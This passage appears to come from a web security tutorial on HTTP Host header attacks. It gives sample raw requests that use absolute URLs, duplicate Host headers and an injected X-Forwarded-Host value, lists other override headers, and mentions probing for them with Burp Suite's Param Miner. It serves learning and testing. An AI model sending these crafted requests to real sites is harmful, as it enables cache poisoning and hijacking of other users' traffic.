# Supply an absolute URL
GET https://vulnerable-website.com/ HTTP/1.1
Host: bad-stuff-here
# Add line wrapping
GET /example HTTP/1.1
Host: bad-stuff-here
Host: vulnerable-website.com
Other Techniques
This is just a small sample of the many possible ways to issue harmful, ambiguous requests. For example, you can also adapt many HTTP request smuggling techniques to construct Host header attacks.
Inject host override headers
# Using X-Forwarded-Host to inject malicious input
GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: bad-stuff-here
# Similar types of headers
X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
In Burp Suite, you can use the Param Miner extension's "Guess headers" function to automatically probe for supported headers using its extensive built-in wordlist.